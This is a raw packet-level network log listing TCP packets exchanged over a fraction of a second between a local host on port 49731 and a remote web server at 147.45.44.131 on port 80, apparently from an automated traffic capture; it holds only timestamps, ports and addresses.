Jan 2, 2025 19:13:05.394963026 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394973040 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394977093 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394984007 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394993067 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395004034 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.395004988 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395021915 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395021915 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.395035982 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395045042 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395051956 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.395060062 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395071030 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395072937 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.395081043 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395090103 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395097017 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.395100117 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395109892 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395117044 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.395119905 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395137072 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.395205021 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395235062 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.395272017 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395279884 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395287991 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395298004 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395307064 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.395328045 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.395366907 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395382881 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395390987 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395401001 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395411015 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.395411015 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395421028 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395430088 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.395431042 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395447016 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.395507097 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395517111 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395525932 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.395536900 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.395560026 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.395615101 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.397403955 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.397584915 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.397593021 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.397603035 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.397612095 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.397620916 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.397623062 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.397634029 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.397636890 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.397643089 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.397653103 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.397663116 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.397664070 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.397680998 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.397686958 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.397686958 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.397691965 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.397701025 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.397710085 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.397720098 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.397721052 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.397731066 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.397739887 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.397742033 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.397752047 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.397758961 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.397762060 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.397772074 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.397779942 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.397783041 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.397802114 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.445555925 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.480782986 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.480808020 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.480823994 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.480835915 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.480845928 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.480855942 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.480870962 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.480874062 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.480885029 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.480901003 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.480906963 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.480912924 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.480923891 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.480925083 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.480936050 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.480946064 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.480947971 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.480958939 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.480969906 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.480982065 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481000900 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481002092 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481009007 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481021881 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481029987 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481034040 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481045008 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481053114 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481062889 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481076002 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481076002 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481086969 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481102943 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481103897 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481113911 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481125116 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481129885 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481141090 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481153011 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481153965 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481163979 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481173038 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481188059 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481190920 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481204033 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481210947 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481215954 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481225014 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481235981 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481236935 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481251955 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481252909 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481261969 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481271982 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481281042 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481282949 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481300116 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481302023 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481318951 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481329918 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481337070 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481347084 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481359005 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481359959 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481369019 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481380939 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481389999 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481391907 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481409073 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481415987 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481419086 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481437922 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481445074 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481446981 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481456995 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481470108 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481471062 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481488943 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481503963 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481517076 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481539011 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481540918 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481549978 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481561899 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481570959 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481571913 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481583118 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481595993 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481595993 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481606007 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481614113 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481623888 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481637955 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481651068 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481652975 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481659889 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481672049 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481674910 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481683016 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481708050 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481723070 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481760025 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481770039 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481780052 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481790066 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481801033 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481801987 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481812954 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481820107 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481829882 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481842995 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481846094 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481858015 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481868029 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481874943 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481880903 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481890917 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481892109 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481900930 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481913090 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481916904 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481921911 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481931925 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481945038 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481945038 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481956005 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481965065 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.481966972 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481987953 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.481998920 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.482019901 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.482072115 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.482080936 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.482089043 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.482099056 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.482109070 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.482114077 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.482121944 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.482125998 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.482131958 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.482141972 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.482150078 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.482152939 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.482162952 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.482178926 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.482204914 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.482217073 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.482225895 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.482234955 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.482250929 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.482256889 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.482260942 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.482271910 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.482278109 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.482281923 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.482294083 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.482300997 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.482321024 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.484174013 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.484184980 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.484194040 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.484196901 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.484206915 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.484216928 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.484220982 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.484230995 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.484236956 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.484261990 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.484313965 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.484323025 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.484339952 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.484349012 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.484360933 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.484364033 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.484374046 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.484378099 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.484391928 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.484402895 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.484407902 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.484419107 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.484427929 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.484441042 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.484441042 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.484450102 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.484457970 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.484460115 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.484469891 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.484479904 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.484488964 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.484503031 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.484508991 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.484513998 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.484533072 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.539310932 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.569276094 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569293022 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569303989 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569314003 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569324970 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569334030 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.569336891 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569353104 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569371939 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569379091 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569386005 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.569390059 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569403887 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.569405079 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569416046 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569427013 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569428921 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.569438934 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569449902 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569458961 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569470882 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569472075 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.569483995 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569499016 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569511890 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569513083 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.569523096 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569530964 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.569535017 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569545031 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569556952 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569557905 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.569574118 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569580078 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.569586039 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569597960 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569597960 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.569607019 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569618940 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569624901 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.569633961 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569650888 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569653988 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.569662094 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569674015 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569677114 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.569684982 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569694996 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569705963 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569716930 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.569717884 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569730043 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569739103 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569747925 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.569751978 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569757938 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.569762945 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569772959 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569792032 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569797993 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.569812059 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569823027 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569833040 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.569834948 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569847107 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.569849968 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.569859028 CET	80	49731	147.45.44.131	192.168.2.4
